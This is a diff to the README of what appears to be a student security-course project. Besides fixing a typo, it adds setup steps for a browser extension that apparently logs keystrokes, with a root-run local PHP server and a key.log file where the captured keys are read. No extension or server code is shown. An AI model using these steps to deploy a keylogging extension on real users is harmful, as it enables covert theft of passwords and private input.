syusri/6841-owo-extension/README.md

 add contents of backend/ in this folder

-Then in Google Chrome Extensins, load the extension/ folder.
+Then in Google Chrome Extensions, load the extension/ folder.

+Then to get the server running (assuming logged in as root using sudo -s): service apache2 start php -S localhost:8000

+Then access the keylog through: localhost:8000/key.log